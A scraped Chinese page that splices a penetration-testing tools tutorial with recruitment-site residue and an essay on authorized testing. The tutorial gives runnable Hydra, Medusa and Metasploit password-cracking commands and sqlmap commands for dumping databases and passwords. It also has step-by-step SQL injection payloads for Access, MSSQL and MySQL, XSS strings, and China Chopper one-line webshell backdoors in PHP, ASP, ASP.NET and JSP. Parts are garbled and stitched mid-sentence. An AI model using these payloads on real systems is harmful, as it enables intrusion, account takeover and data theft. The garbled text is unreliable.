围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)
MSF渗透扫描模块:
2.Hydra破解
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&=^PASS^:&title&wrong username or password&/title&"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,&title&中的内容是表示错误猜解的返回信息提示。)
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.&pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
参考网址:
3.Medusa暴力破解远程
kali &&linux自带破解工具,使用的时候要获得一些必要的信息。
1、目标IP地址
2、登录目标的一个用户名或者一个用户名文件(都是猜测的用户名也可以说是用户名字典)
3、密码字典
4、要验证的服务名称(比如ssh、http、telnet等)
使用命令:
&medusa -h target_ip(攻击ip) -u username -P path_to_passwordlist(密码文件要打绝对路径) -M
&authentication_service_to_attack(要验证的服务名称)
&-u是要攻击的目标的id(用户名)号,如果改为大写的U,将会是利用用户名列表进行攻击,-M参数后面接的是你要攻击的验证服务名称。
参考网址:/jingyan/1597226.html
4.payload破解
search tomcat查看tomcat的payload
payload就是加载模块调用攻击的有效加载项。(真心抽象)
msfconsole回车
use auxiliary/scanner/http/tomcat_mgr_login &&调用tomcat破解程序
show options &&&查看选项
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)
set rport 8080 &&&设置端口
set username root 设置用户名(set user_file /*/*.*设置帐号字典)
set pass_file /root/*.* &设置密码字典
set threads 50 &&设置线程50
run &&开始执行。
注:所有路径必须是绝对路径。
四.Sql注入工具
sqlmap:数据库注入工具。
可以用来猜测数据库类型和利用漏洞渗透数据库
注入点一般存在登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。
比如:最常用的寻找SQL注入点的方法,是在网站中寻找如下形式的页面链接:/xxx.asp?id=YY
&其中&YY&可能是数字,也有可能是字符串,分别被称为整数类型数据或者字符型数据。
一般有一下几种方法:
1、加 &' &法
浏览器可能会返回类似于下面的错误提示信息:Microsoft JET Database Engine 错误&80040e14表示有注入点。
2、and 1=1 和and 1=2 将and 1=1 写在url最后面访问显示正常,而and 1=2 提示错误说明有可能有注入点。如果两种方式结果一样,就表示没戏。
3、sqlmap下输入 &&(-u "域名" --level 5 --dbs) &猜测数据库类型
Sqlmap参数使用
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users &&查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
加入python环境使用方法:
sqlmap.py -u url &判断
sqlmap.py -u url --is-dba -v &这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 &这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T &表&-D &数据库&爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0&爆数据库
sqlmap.py -u url --users --password 爆用户名密码。
2.明小子Domain
明小子domian工具是针对Access、mssql数据库的sql注入工具,另外此工具可用于扫描管理后台、上传、下载路径,也可进行简单的md5破解!(此工具功能性有限)
使用方法:
1、先打开我们的明小子,在当前路径这里输入你要注入的网站地址,然后连接如下图。如果此网站有注入点的话,下面注入点框内会出现红色的注入点地址。
2、我们任意选中一个地址单击鼠标右键,点击检测注入。
3、然后点击开始检测按钮后,如下图操作。
最后我们得到网站的账号密码后 就可以去网站后台去登录了
3.Pangolin穿山甲
输入url地址进行检测
参考地址:/thread-758-1-1.html
4.纯手工sql注入
第一步先把IE菜单=&工具=&Internet选项=&高级=&显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
数字型:and 1=1 and 1=2 判断是否存在注入
字符型:' and '1'='1 ' and '1'='2
搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%
IIS报错情况下使用:
and user&0 (判断是ACCESS还是MSSQL)
不报错则使用各自数据库特性来判断
and (select count(*) from msysobjects)&0 (返回权限不足access数据库)
and (select count(*) from sysobjects)&0 (返回正常则为MSSQL数据库)
and db_name()&0 (返回数据库名)
and 0&&(select @@version)-- (判断版本信息)
and db_name()&0 (返回数据库名)
************注意:猜解之前先要找到后台地址,不然白忙了**********
ACCESS注入:
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from [admin])
and (Select Count(*) from Admin)&0
猜解字段:(字段username存在则正常,不正常则不存在)
and (Select username from Admin)&0
and exists (select username from [admin])
猜解用户名和密码长度
and (select top 1 len(username) from Admin)&0
and (select top 1 len(password) from Admin)&0
原 理:如果top 1的username长度大于0,则条件成立;接着就是&1、&2、&3这样测试下去,一直到条件不成立为止,比如&4成立,&5不成立,就是len(username)=5,即用户名长度为5.得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码.
and (select top 1 asc(mid(username,1,1)) from Admin)&0,1,2&,
当输入到109时,显示错误,而108之前显示正确,说明第一个字符的ASCII码为109.,得到第一个字符是m。
同理and (select top 1 asc(mid(username,2,1) from Admin)&0,1,2&
到114的时候不成立,说明第二个字符的ASCII码值为114,字符为r。
注意的是英文和数字的ASCII码在1-128之间...
MSSQL注入:
having 1=1-- 【爆出一个表名及字段,如:列 'users.ID' 在选择列表中无效】
group by users.ID having 1=1--
group by users.ID, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )-- 【插入新记录】
猜解表名:
SQL SERVER的每一个数据库都会有用户表和系统表,在系统表sysobjects中,数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在sysobjects表中占一行,那么也就是说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个,name (数据表的名字),xtype( 数据表的类型 u为用户表),id( 数据表的对象标志)。
and (select top 1 name from sysobjects where xtype='u')&0 (得到第一个表名:比如user)
and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))&0 得到第二个表名,后面的以此类推。。
猜解列名:
用 到系统自带的2个函数col_name()和object_id(),col_name()的格式是&COL_NAME( table_id , column_id )&,参数table_id是表的标识号,column_id是列的标识号,object_id(admin)就是得到admin在sysobjects 中的标识号,column_id=1,2,3表明admin的第1,2,3列。
and (select top 1 col_name(object_id('admin'),1) from sysobjects)&0 【得到admin字段的第一个列名&username&依次类推,得到&password&&id&等等】
猜解字段内容:
and (select top 1 username from [admin])&0 【直接得到用户名】
and (select top 1 password from [admin])&0 【直接得到密码】
UNION联合查询:
select name,password,id from user union select user,pwd,uid from 表名
and 1=1 union select 1,2,3,4,5... from 表名 (数值从1开始慢慢加,如果加到5返回正常,那就存在5个字段)
ASCII逐字解码法:
1、猜解列长度
and (select top 1 len(列名)from 表名)&N
其中N是数字,变换这个N的值猜解列长度,当N为6正确,为7错误,则长度为7
猜解第二条记录就该使用:select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)
2、猜解用户和密码
ASC()函数和Mid函数,ASC(mid(列名,N,1))得到&列名&第N位字符ASCII码
猜解语句为:and (select top 1 asc(mid(字段,1,1)) from 数据库名)&ASCII码
区间判断语句:....between......and......
中文处理法:当ASCII转换后为&负数&使用abs()函数取绝对值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码
ASCII逐字解码法的应用:
1、猜解表名:and (select count(*) from admin)&&0
2、猜解列名:and (select count(列名) from 表名)&&0
3、猜解用户个数:and (select count(*) from 表名)&1,2.. 2正常,3错误,表中有3条记录。
4、猜解用户名的长度:and (select len(列名) from 表名)&=1、&=2、&=3、&=4。
5、猜解用户名:and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)&&0
最后提交:and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到密码了。
MYSQL+PHP注入:
1.判断是否存在注入,加';and 1=1 ;and 1=2
2.判断版本 and ord(mid(version(),1,1))&51 代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)&0 onerror=alert(/xss/) width=150&&/img& ( 表示注释)
&img src=vbscript:msgbox ("xss")&&/img&
&style& input {left:expression_r (alert('xss'))}&/style&
&div style={left:expression_r (alert('xss'))}&&/div&
&div style={left:expression_r (alert('xss'))}&&/div&
&div style={left:\ression (alert('xss'))}&&/div&
html 实体 &div style={left:expression (alert('xss'))}&&/div&
unicode &div style="{left:expression_r (alert('xss'))}"&[/post]
参考地址:
五.Web扫描测试工具
1.绿盟RSAS远程安全评估系统
新建扫描任务(可输入单个IP地址,ip段,或者导入ip地址文件)
配置扫描项(登录检查、弱口令测试、端口扫描)
口令猜测详细配置项如下:
导出扫描报告,格式(html、word、pdf、excel),勾选单个主机报表项。
&2.Burpsuite
Burp Suite 是用于攻击 web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。Burp Suite 能高效率地与单个工具一起工作,例如:一个中心站点地图是用于汇总收集到的目标应用程序信息,并通过确定的范围来指导单个程序工作。在一个工具处理 HTTP 请求和响应时,它可以选择调用其他任意的 Burp 工具。例如,代理记录的请求可被 Intruder 用来构造一个自定义的自动攻击的准则,也可被 Repeater 用来手动攻击,也可被 Scanner 用来分析漏洞,或者被 Spider(网络爬虫)用来自动搜索内容。应用程序可以是&被动地&运行,而不是产生大量的自动请求。 Burp Proxy 把所有通过的请求和响应解析为连接和形式,同时站点地图也相应地更新。由于完全的控制了每一个请求,你就可以以一种非入侵的方式来探测敏感的应用程序。当你浏览网页(这取决于定义的目标范围)时,通过自动扫描经过代理的请求就能发现安全漏洞。IburpExtender 是用来扩展 Burp Suite 和单个工具的功能。一个工具处理的数据结果,可以被其他工具随意的使用,并产生相应的结果。
Burp Suite 工具箱Proxy&&是一个拦截 HTTP /S 的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Spider&&是一个应用智能感应的网络爬虫,它能完整的枚举应用程序的内容和功能。Scanner[仅限专业版]&&是一个高级的工具,执行后,它能自动地发现 web 应用程序的安全漏洞。Intruder&&是一个定制的高度可配置的工具,对 web 应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用 fuzzing 技术探测常规漏洞。Repeater&&是一个靠手动操作来补发单独的 HTTP 请求,并分析应用程序响应的工具。Sequencer&&是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。Decoder&&是一个进行手动执行或对应用程序数据者智能解码编码的工具。
3.IBM appscan
下面打开appscan创建扫描。
选择常规扫描,进入配置向导。点击下一步,进入配置
上面这一步是重点,起始URL填写你要扫描的网址。其它服务器和域:这里把抽取的所有链接都添加进去。包括后网站的首页链接。点击下一步。
这里提供三种方式来记录帐号,不多介绍。第一种和第三种最常用。
然后点击几个下一步后出现后面的选项,选择第三个或第四项完成扫描的配置。
录制扫描脚本
完成配置后,下面就要开始录制脚本了呢。
点击工具栏上的探索按钮,appscan会打开自带浏览器,输入系统用户名密码登录系统,对你要扫描的模块功能进行操作。
上图为我打开的appscan自带浏览器(因为我输入的网址有误,所以无法访问)。操作完成之后,点击暂停按钮,关闭浏览器窗口即可。
关闭浏览器后,上面的窗口中会记录所有你访问的连接,点击确定。所有的信息就会记录下来了,下面要做的点击点击工具栏上的扫描按钮开始扫描。我们一般晚上下班进行,第二天早上来看扫描结果就可以了。
本来到这里就可以结束了,我再多说个设置。在手动探索的时候,因为打开的浏览器是appscan自带的,可能会存在兼容性问题,有些页面无法正常打开。那么是否可以用我们电脑上的浏览器(IE 、火狐、谷歌)来进行录制呢了。当然是可以的。
菜单栏--工具---选项----高级
这个一定要大图,我们只需要修改openExternalBrowser&选项&值&的参数就可以了(1=IE、2=firefox、3=chrome)。
4.Acunetix WVS 7使用
六.漏洞利用工具
1.FCK编辑器漏洞综合利用工具
2.Struts2终极漏洞利用工具
Struts2终极漏洞:远程代码执行漏洞,获取权限可执行任意命令。
详细原理介绍参考网址:
七.上传工具
中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。最强悍的是软件服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟中国菜刀怎么使用?下面是叉叉的一些使用方法和经验总结
客户端界面:
在服务端运行的代码如下:
PHP: &?php @eval($_POST['pass']);?&ASP: &%eval request(&pass&)%&ASP.NET: &%@ Page Language=&Jscript&%&&%eval(Request.Item["pass"],&unsafe&);%&
JSP:&%if(request.getParameter(&f&)!=null)(new java.io.FileOutputStream(application.getRealPath(&\&)+request.getParameter(&f&))).write(request.getParameter(&t&).getBytes());%&(注意: ASP.NET要单独一个文件或此文件也是Jscript语言)
叉叉之前在上传演示,利用burpsuite抓包改包上传最后讲到用菜刀连接,看看是怎么实现的:
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(这个必须要),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了.
1. 文件管理:缓存目录,并支持离线查看缓存目录,上传下载修改文件
2. 虚拟终端:人性化的设计,操作方便;(输入HELP查看更多用法)
3. 数据库管理:图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
关于配置信息怎么填?PHP脚本:&T&类型&/T& 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种&H&主机地址&H& 主机地址可为机器名或IP地址,如localhost& U&数据库用户&/U& 连接数据库的用户名,如root& P&数据库密码&/P& 连接数据库的密码,如123455ASP和ASP.NET脚本:&T&类型&/T& 类型只能填ADO& C&ADO配置信息&/C&ADO连接各种数据库的方式不一样。如MSSQL的配置信息为Driver={Sql Server};Server=(local);Database=Uid=Pwd=123456
叉叉用本机的mysql来演示:
4.网站蜘蛛功能:织出一张网站的目录结构。下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
5.定时提醒当闹钟来使吧, 周期:每月/每周/每日/只一次。
6.快速启动一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。7.地址栏输入HELP
8.自定义服务端代码
参考地址:
八.后台、目录扫描工具
打开工具,添加URL
双击添加目录、后台字典文件,设置线程,HTTP响应回显信息
阅读(...) 评论()}
渗透测试工程师
渗透测试工具
渗透测试是一种利用模拟黑客攻击的方式,来评估计算机网络系统攻击步骤
安全性能的方法。评估计算机网络系统
安全性能的方法。通常的黑客攻击包括预攻击、攻击和后攻击三个阶段;预攻击阶段主要指一些信息收集和漏洞扫描的过程;攻击过程主要是利用第一阶段发现的漏洞或弱口令等脆弱性进行入侵;后攻击是指在获得攻击目标的一定权限后,对权限的提升、后面安装和痕迹清除等后续工作。与黑客的攻击相比,渗透测试仅仅进行预攻击阶段的工作,并不对系统本身造成危害,即仅仅通过一些信息搜集手段来探查系统的弱口令、漏洞等脆弱性信息。为了进行渗透测试,通常需要一些专业工具进行信息收集。渗透测试工具种类繁多,涉及广泛,按照功能和攻击目标分为网络扫描工具、通用漏洞检测、应用漏洞检测三类。
网络扫描工具
网络扫描是渗透测试的第一步,其目的在于发现目标的操作系统类型、开放端口等基本信息,为后续的扫描工作做基础。事实上,利用操作系统本身的一些命令如ping、telnet、nslookup等也可以对目标的信息进行判断,但是利用专业的工具可以给出更加全面和准确的判断。
NMap 是Linux操作系统下的一款网络连接端扫描软件,其功能主要有三个:探测一组主机是否在线;扫描主机端口是否打开;判断目标操作系统。NMap的常用扫描方式有:
》 TCP connect端口扫描:-sT参数
》 端口扫描TCP同步:-sS参数
》 端口扫描UDP:-sU参数
》 Ping扫描:-sP参数
SuperScan是一款功能强大的端口扫描软件,其主要功能有:
1) 通过Ping来检验IP是否在线; 2) IP和域名相互转换; 3) 检验目标计算机提供的服务类别; 4) 检验一定范围目标计算机的是否在线和端口情况; 5) 工具自定义列表检验目标计算机是否在线和端口情况; 6) 自定义要检验的端口,并可以保存为端口列表文件; 7) 软件自带一个木马端口列表trojans.lst,通过这个列表我们可以检测目标计算机是否有木马;同时,我们也可以自己定义修改这个木马端口列表.
Wireshark是一个网络封包分析软件,其功能是借取流经本地网卡的有数据流量进而分Wireshark
析。通常的应用包括:网络管理员用来解决网络问题、网络安全工程师用来检测安全隐患、开发人员用来测试协议执行情况、用来学习网络协议。 在渗透测试中,Wireshark通常被用于嗅探局域网内的数据传输格式,探查是否存在明文传输口令、数据传输风险等。图形界面的Wireshark使用十分便捷,选取监听的网卡之后,主界面中会显示所有的数据流量。双击任意条目,则可以根据协议的层次拆分该数据流。Wireshark内置了基本的网络协议,可以方便的查询包括但不局限于IP、TCP、UDP、HTTP、FTP、SMB等常见的协议内容。
由于Wireshark借取的数据是所有流经网卡的数据,在实际应用中最重要的操作是通编写过滤器获得需要的数据流量。主界面中的Filter选项可以方便的进行过滤器的编辑,过滤包括源地址、目的地址、协议类型等配合各种逻辑运算符组成的表达式,从而根据需要快速的找到目标数据流量。
通用漏洞检测
在获取了目标主机的操作系统、开放端口等基本信息后,通常利用通用漏洞扫描工具检测目标系统所存在的漏洞和弱口令。通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-8-67、oracle的漏洞。由于系统开启了135、139、445、等应用程序端口,同时没有及时安装补丁,使得外来主机可以通过相应的端口发送恶意的请求从而获取不应当获得的系统权限。 在实际的应用中,如果防火墙做了良好的部署,则对外界展现的端口应该受到严格控制,相应的通用漏洞危害较小。但是如果没有在边界上进行良好的访问控制,则缓冲区溢出漏洞有着极其严重的威胁,会轻易被恶意用户利用获得服务器的最高权限。
Nessus 是一款系统漏洞扫描与分析软件,采用B/S架构的Nessus
方式安装,以网页的形式向用户展现。用户登录之后可以指定对本机或者其他可访问的服务器进行漏洞扫描。Nessus的扫描程序与漏洞库相互独立,因而可以方便的更新其漏洞库,同时提供多种插件的扩展和一种语言NASL(Nessus Attack Scripting Language)用来编写测试选项,极大的方便了漏洞数据的维护、更新。在进行扫描完成后,Nessus还可以生成详尽的用户报告,包括脆弱性、漏洞修补方法以及危害级别等,可以方便的进行后续加固工作。
X-Scan 是一款国产的漏洞扫描软件,完全免费,无需安装,X-Scan
由国内著名民间黑客组织“安全焦点”完成。X-Scan的功能包括:开放服务、操作系统鉴别、应用系统弱口令、IIS编码漏洞、应用漏洞检测等。
X-Scan通常被用来进行弱口令的检测,其提供的弱口令检测模块包含telnet、ftp、SQL-server、cvs、vnc、smtp、nntp、sock5、imap、pop3、rexec、NT-Server、ssh、www,采用字典攻击的方式,配合恰当的字典生成工具可以完成大部分常用应用软件的弱口令破解工作。X-Scan也提供漏洞检测脚本的加载方式,可以即时的更新扫描模块,同时也提供扫描结果报告功能。
Metasploit
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
事实上Metasploit提供的是一个通用的漏洞攻击框架,通过它可以方便的获取、开发针对漏洞的攻击。Metasploit将负载控制,编码器,无操作生成器和漏洞整合在一起,成为一种研究高危漏洞的途径,它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。 对于开发者来说,需要了解缓冲区溢出的原理、需要编写的漏洞详细情况、payload生成、注入点以及metasploit的漏洞编写规则。而对于普通的渗透测试人员,仅仅只需要安装metasploit,下载最新的漏洞库和shellcode,选择攻击目标,发送测试就可以完成漏洞检测工作。事实上,metasploit不仅提供漏洞检测,还可以进行实际的入侵工作。由于采用入侵脚本时可能对系统造成不可预估的效果,在进行渗透测试时应当仅仅使用测试功能。
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner界面
Acunetix Web Vulnerability Scanner是一个网站及
服务器漏洞扫描软件,它包含有收费和免费两种版本。
功能介绍:
1、AcuSensor 技术
2、自动的客户端脚本分析器,允许对 Ajax 和 Web 2. 应用程序进行安全性测试。
3、业内最先进且深入的 SQL 注入和跨站脚本测试
4、高级渗透测试工具,例如 HTTP Editor 和 HTTP Fuzzer
5、可视化宏记录器帮助您轻松测试 web 表格和受密码保护的区域
6、支持含有 CAPTHCA 的页面,单个开始指令和 Two Factor(双因素)验证机制
7、丰富的报告功能,包括 VISA PCI 依从性报告
8、高速的多线程扫描器轻松检索成千上万个页面
9、智能爬行程序检测 web 服务器类型和应用程序语言
1、Acunetix 检索并分析网站,包括 flash 内容、SOAP 和 AJAX
11、端口扫描 web 服务器并对在服务器上运行的网络服务执行安全检查
Web应用漏洞检测
随着信息网络的发展,人们的信息安全意识日益提升,信息系统的安全防护措施也逐渐提高。通常在服务器的互联网边界处都会部署防火墙来隔离内外网络,仅仅将外部需要的服务器端口暴露出来。采用这种措施可以大大的提高信息系统安全等级,对于外部攻击者来说,就像关闭了所有无关的通路,仅仅留下一个必要入口。但是仍然有一类安全问题无法避免,就是web应用漏洞。 目前的大多数应用都是采用B/S模式,由于服务器需要向外界提供web应用,http服务是无法关闭的。web应用漏洞就是利用这个合法的通路,采用SQL注入、跨站脚本、表单破解等应用攻击方式来获取服务器的高级权限。在目前的网络环境下,威胁最大的漏洞形式就是web应用漏洞,通常是攻击者攻陷服务器的第一步。常见的漏洞包括SQL注入、跨站脚本攻击和编码漏洞等,表单破解主要是针对服务器用户的弱口令破解。从本质上来说,应用漏洞的形成原因是程序编写时没有对用户的输入字符进行严格的过滤,造成用户可以精心构造一个恶意字符串达到自己的目的。
AppScan 是IBM公司出的一款Web应用安全测试工具,AppScan
采用黑盒测试的方式,可以扫描常见的web应用安全漏洞。其工作原理,首先是根据起始页爬取站下所有可见的页面,同时测试常见的管理后台;获得所有页面之后利用SQL注入原理进行测试是否存在注入点以及跨站脚本攻击的可能;同时还会对cookie管理、会话周期等常见的web安全漏洞进行检测。AppScan功能十分齐全,支持登录功能并且拥有十分强大的报表。在扫描结果中,不仅能够看到扫描的漏洞,还提供了详尽的漏洞原理、修改建议、手动验证等功能。AppScan的缺点在于,作为一款商业软件,价格十分昂贵。
溯雪是一款国产软件,主要的功能是进行表单破解。溯雪
由于目前的应用多数采用B/S模式,登录窗口也都采用表单提交的方式,使得基于传统协议的暴力破解软件没有用武之地。针对此类应用,采用溯雪等基于表单的暴力破解软件可以很好的进行弱口令扫描。
溯雪的工作原理是抽取目标网站中的表单元素,搜寻错误登录时的错误标志,然后采用字典填充其值并不断提交尝试获得正确的连接。
Pangolin是一款SQL注入测试工具,能够自动化的进行Pangolin
注入漏洞的检测,从检测注入开始到最后控制目标系统都给出了测试步骤,是目前国内使用率最高的SQL注入测试软件。支持的数据库包括Access、DB2、Informix、Microsoft SQL Server 2、Microsoft SQL Server 25、Microsoft SQL Server 28、Mysql、Oracle、PostgreSQL、Sqlite3、Sybase。
#渗透测试工程师#&
#测试工程师#&
#渗透测试工程师#&
#测试工程师#&
平均¥8468
工资分布图(k)
该职位相关热门公司
28474条信息
看了该职位的还看了
32704条信息
29176条信息
39517条信息
43882条信息
14401条信息
关注看准官方微信
下载看准官方APP
找工作,下载「看准APP」
23982 位HR实时在线
广告等垃圾信息
违禁信息(色情、欺诈、非法传销)
不友善内容(诽谤,人身攻击、骚扰、侵犯隐私)
违法、政治敏感内容
感谢您的举报,我们会尽快处理~
小贴士:问题描述的越清楚,越能吸引老鸟来回答哟~
请输入问题
向老鸟咨询
把你关于渗透测试工程师的问题大胆的提出来,这里的15位老鸟很乐意为你解答~
写下问题吧~
提交成功!请静静等待老鸟们回答~
扫描二维码
分享到朋友圈,邀请微信好友帮忙解答浅谈渗透测试中的攻守之道
&&&身处不同的渗透测试环境下就会有不同的渗透思路以及渗透的技术手段,今天我们将从攻与守两个不同的视角来了解渗透测试在不同处境下所使用的技术手段。
&&&&&&&&从攻方视角看渗透
攻方既包括了潜在的黑客、入侵者,也包括了经过企业授权的安全专家。在很多黑客的视角中,只要你投入了足够多的时间和耐心,那么这个世界上就没有不可能渗透的目标。目前我们只从授权渗透的角度来讨论渗透测试的攻击路径及其可能采用的技术手段。
测试目标的不同,自然也导致了技术手段的不同,接下来我们将简单说明在不同的位置可能采用的技术手段。
内网测试指的是由渗透测试人员在内部网络发起的测试,这类的测试能够模拟企业内部违规操作者的行为。它的最主要的“优势”就是绕过了防火墙的保护。内部可能采用的主要渗透方式有:远程缓冲区溢出,口令猜测,以及B/S或C/S应用程序测试(如果在渗透测试中有涉及到C/S程序测试的,那么就需要提前准备相关客户端软件供测试使用)。
&&&&&&&&外网测试
外网测试则恰恰与内网测试相反,在此类测试当中渗透测试人员完全处于外部网络(例如拨号、ADSL或外部光纤),来模拟对内部状态一无所知的外部攻击者的行为。外部可能采用的渗透方式包括:对网络设备的远程攻击,口令管理安全性测试,防火墙规则试探、规避、Web及其它开放应用服务的安全性测试。
不同网段/Vlan之间的渗透
这种渗透方式是从某内/外部网段,尝试对另一网段/Vlan来进行渗透。这类测试通常可能用到的技术包括:对网络设备的远程攻击、对防火墙的远程攻击或规则探测、规避尝试。
信息的收集和分析伴随着渗透测试的每一个步骤,而每一个步骤又有三个部分组成:操作、响应和结果分析。
通过对目标地址的TCP/UDP端口扫描,确定其所开放的服务的数量以及类型,这是所有渗透测试的基础。端口扫描是计算机解密高手喜欢的一种方式。通过端口扫描,可以大致确定一个系统的基本信息并搜集到很多关于目标主机的各种有用的信息,然后再结合安全工程师的相关经验就可以确定其可能存在的以及可能被利用的安全弱点,从而为进行深层次的渗透提供可靠性依据。
这是当前出现的频率最高、威胁最严重,同时又是最容易实现的一种渗透方法,一个仅仅具有一般的基础性网络知识的入侵者就可以在相当短的时间内利用现成的工具实现远程溢出攻击。
对于防火墙内的系统同样存在这样的风险,只要对跨接防火墙内外的一台主机攻击成功,那么通过这台主机对防火墙内的主机进行攻击就易如反掌。
口令猜测也是一种出现概率很高的风险,几乎不需要任何攻击工具,利用一个简单的暴力攻击程序和一个比较完善的字典,就可以进行猜测口令。
对一个系统账号的猜测通常包括两个方面:首先是对用户名的猜测,其次是对密码的猜测。只要攻击者能猜测或者确定用户口令,就能获得机器或者网络的访问权,并且能够访问到用户能够访问的审核信息资源。
&&&&&&&&本地溢出
所谓本地溢出是指在拥有了一个普通用户的账号之后,通过一段特殊的指令代码来获取管理员权限的方法。使用本地溢出的前提是首先你要获得一个普通用户密码。也就是说由于导致本地溢出的一个关键条件是设置不当的密码策略。
多年的实践证明,在经过前期的口令猜测阶段获取的普通账号登录系统之后,对系统实施本地溢出攻击,就能获取不进行主动安全防御的系统的控制管理权限。
&&&&&&&&脚本及应用测试
&&&&&&&&Web脚本及应用测试专门针对Web及数据库服务器进行。根据最新的技术统计表明,脚本安全弱点是当前Web系统尤其是存在动态内容的Web系统比较严重的安全弱点之一。利用脚本相关弱点轻则可以获取系统其他目录的访问权限,重则将有可能取得系统的控制管理权限。因此对于含有动态页面的Web、数据库等系统,Web脚本及应用测试将是渗透测试中必不可少的一个环节。
在Web脚本及应用测试中,可能需要检查的部份包括:
(1)检查应用系统架构,防止用户绕过系统直接修改数据库;&
(2)检查身份认证模块,用以防止非法用户绕过身份认证;
(3)检查数据库接口模块,用以防止用户获取系统权限;
(4)检查文件接口模块,防止用户获取系统文件;
(5)检查其他安全威胁。
